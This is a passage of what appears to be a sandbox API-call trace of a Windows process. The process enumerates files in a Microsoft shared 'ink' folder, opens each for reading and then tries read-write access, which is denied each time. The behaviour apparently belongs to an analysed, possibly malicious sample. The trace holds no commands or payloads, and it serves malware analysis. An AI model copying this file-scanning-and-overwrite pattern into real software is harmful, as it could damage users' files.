lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a1d507, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1af9c24, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1af9c24, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x30d3a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="join.avi", cAlternateFileName="")) returned 1 [0082.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0082.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0082.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0082.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0082.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0082.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.562] AreFileApisANSI () returned 1 [0082.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi", lpUsedDefaultChar=0x0) returned 66 [0082.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0082.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0082.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0082.562] AreFileApisANSI () returned 1 [0082.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0082.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82718 [0082.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x82718, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 66 [0082.562] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.562] GetFileType (hFile=0x430) returned 0x1 [0082.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82718 | out: hHeap=0x20000) returned 1 [0082.563] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.563] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.563] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.563] CloseHandle (hObject=0x430) returned 1 [0082.563] AreFileApisANSI () returned 1 [0082.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0082.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x820e8 [0082.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x820e8, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 66 [0082.563] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.563] GetLastError () returned 0x5 [0082.564] GetLastError () returned 0x5 [0082.564] SetLastError (dwErrCode=0x5) [0082.564] GetLastError () returned 0x5 [0082.564] SetLastError (dwErrCode=0x5) [0082.564] GetLastError () returned 0x5 [0082.564] SetLastError (dwErrCode=0x5) [0082.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x820e8 | out: hHeap=0x20000) returned 1 [0082.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0082.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.564] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dad75cd, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7e563000, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="micaut.dll.mui", cAlternateFileName="")) returned 1 [0082.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0082.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0082.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0082.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0082.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.565] AreFileApisANSI () returned 1 [0082.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui", lpUsedDefaultChar=0x0) returned 72 [0082.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0082.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0082.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.565] AreFileApisANSI () returned 1 [0082.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0082.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0082.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui") returned 72 [0082.565] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0082.706] GetFileType (hFile=0x340) returned 0x1 [0082.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0082.706] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.708] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.708] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.708] CloseHandle (hObject=0x340) returned 1 [0082.708] AreFileApisANSI () returned 1 [0082.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0082.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0082.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui") returned 72 [0082.708] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.708] GetLastError () returned 0x5 [0082.708] GetLastError () returned 0x5 [0082.708] SetLastError (dwErrCode=0x5) [0082.708] GetLastError () returned 0x5 [0082.708] SetLastError (dwErrCode=0x5) [0082.709] GetLastError () returned 0x5 [0082.709] SetLastError (dwErrCode=0x5) [0082.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0082.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0082.709] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.709] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.709] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da8b116, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7d250300, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="mip.exe.mui", cAlternateFileName="")) returned 1 [0082.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0082.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0082.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0082.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0082.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0082.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0082.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.710] AreFileApisANSI () returned 1 [0082.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui", lpUsedDefaultChar=0x0) returned 69 [0082.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0082.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0082.710] AreFileApisANSI () returned 1 [0082.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0082.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0082.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui") returned 69 [0082.710] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0082.711] GetFileType (hFile=0x340) returned 0x1 [0082.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0082.711] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.711] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.712] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.712] CloseHandle (hObject=0x340) returned 1 [0082.712] AreFileApisANSI () returned 1 [0082.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0082.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0082.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui") returned 69 [0082.712] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.712] GetLastError () returned 0x5 [0082.712] GetLastError () returned 0x5 [0082.712] SetLastError (dwErrCode=0x5) [0082.712] GetLastError () returned 0x5 [0082.712] SetLastError (dwErrCode=0x5) [0082.712] GetLastError () returned 0x5 [0082.712] SetLastError (dwErrCode=0x5) [0082.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0082.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0082.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.713] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da18a06, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x80b88a00, 